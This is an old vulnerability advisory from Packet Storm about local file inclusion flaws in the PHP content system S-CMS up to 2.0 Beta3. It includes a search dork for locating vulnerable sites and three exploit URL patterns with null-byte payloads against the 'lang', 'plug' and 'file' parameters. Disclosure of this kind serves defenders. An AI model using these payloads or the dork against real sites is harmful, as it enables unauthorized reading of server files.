S-CMS 2.0 Beta3 Local File Inclusion

2009-06-09T00:00:00
ID PACKETSTORM:78177
Type packetstorm
Reporter YEnH4ckEr
Modified 2009-06-09T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES --S-CMS <= v-2.0 Beta3-->  
------------------------------------------------------------------------  
  
CMS INFORMATION:  
  
-->WEB: http://www.matteoiammarrone.com/public/s-cms/  
-->DOWNLOAD: http://www.matteoiammarrone.com/public/s-cms/  
-->DEMO: N/A  
-->CATEGORY: CMS / Portal  
-->DESCRIPTION: Cms written in php and mysql, phpnuke style whit a plugins,  
blocks and permission system.  
-->RELEASED: 2009-05-25  
  
CMS VULNERABILITY:  
  
-->TESTED ON: firefox 3  
-->DORK: "S-CMS by matteoiamma"  
-->CATEGORY: LOCAL FILE INCLUSION (LFI)  
-->AFFECT VERSION: <= 2.0-Beta3  
-->Discovered Bug date: 2009-05-25  
-->Reported Bug date: 2009-05-25  
-->Fixed bug date: 2009-05-28  
-->Info patch(2.1): http://www.matteoiammarrone.com/public/s-cms/plugin.php?page=phpbb3  
-->Author: YEnH4ckEr  
-->mail: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: N/A  
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.  
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)  
  
  
  
###########################  
///////////////////////////  
  
LOCAL FILE INCLUSION (LFI):  
  
///////////////////////////  
###########################  
  
Note: Of course use null byte (%00) when you want to include a file with different extension to "php"  
  
  
<<<<---------++++++++++++++ Condition: register global = ON +++++++++++++++++--------->>>>  
  
  
  
[++] var --> 'lang'  
  
  
  
~~~~~> http://[HOST]/[PATH]/?lang=[LFI]%00  
  
  
  
<<<<---------++++++++++++++ Condition: Be admin user +++++++++++++++++--------->>>>  
  
  
  
[++] GET var --> 'plug'  
  
  
  
~~~~~> http://[HOST]/[PATH]/admin.php?op=admin&plug=[LFI]%00  
  
  
  
<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>  
  
  
  
[++] GET var --> 'file'  
  
  
  
~~~~~> http://[HOST]/[PATH]/plugin.php?page=contact&file=[LFI]%00  
  
  
  
  
#######################################################################  
#######################################################################  
##*******************************************************************##  
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##  
##*******************************************************************##  
##-------------------------------------------------------------------##  
##*******************************************************************##  
## GREETZ TO: SPANISH H4ck3Rs community! ##  
##*******************************************************************##  
#######################################################################  
#######################################################################  
`